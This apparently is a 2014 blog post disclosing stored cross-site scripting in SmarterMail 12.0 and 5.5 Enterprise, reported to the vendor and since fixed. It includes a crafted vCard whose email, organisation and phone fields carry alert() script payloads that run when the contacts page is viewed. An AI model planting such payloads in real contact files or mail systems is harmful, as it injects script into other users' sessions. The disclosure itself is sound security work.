[XSS] Breif Security Review – Smartermail 12.0 and 5.5 Enterprise

SMARTERMAIL 12.0.x FREE EDITION:

Vulnerability 1:
Contact Book XSS:

It is possible to send someone a vulnerable .vcf contact file, assuming they are accessing it through Smartermail. The code is executed upon viewing the contact book.
Using the following .VCF file parameters including attack command, in javascript, alert(1):

v12_contact
The following was the result of the above XSS attack:
v12

Version 5.5 Enterprise:
The below fields can be seen below:

BEGIN:VCARD
ADR;HOME=TRUE:;;foo11;foo12;foo13;foo14;foo15
ADR;WORK=TRUE:;foo25;foo18;foo19;foo20;foo21;foo22
EMAIL;INTERNET=TRUE:alert(2)
FN:foo1 foo2 foo3 foo4
N:foo3;foo1;foo2;;foo4
NOTE:foo24
ORG:alert(6);foo17
PRODID:-//SmarterTools//SmarterMail//EN
REV:20140119T173038Z
SORT-STRING:alert(1)
TEL;ISDN=TRUE:foo10
TEL;PAGER=TRUE:foo8
TEL;CELL=TRUE;VOICE=TRUE:alert(4)
TEL;HOME=TRUE;VOICE=TRUE:foo7
TEL;WORK=TRUE;VOICE=TRUE:alert(3)
TEL;HOME=TRUE;FAX=TRUE:foo9
TEL;WORK=TRUE;FAX=TRUE:alert(5)
TITLE:foo16
URL:foo6
END:VCARD

5.5_address

The result can be seen below by visiting the contacts page, the code is executed:

5.5_address_result

The VCARDS used in these attacks can be viewed here:
[ .TXT ] VCard Version 12.0
[ .TXT ] VCard Version 5.5 Enterprise

This issue was reported to Smartertools and I am happy to report that the issues have been resolved speedily with a new build with version numbers after and including: 12.0.5197.19984

Advertisements

~ by Rhys Mossom on April 28, 2014.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

 
%d bloggers like this: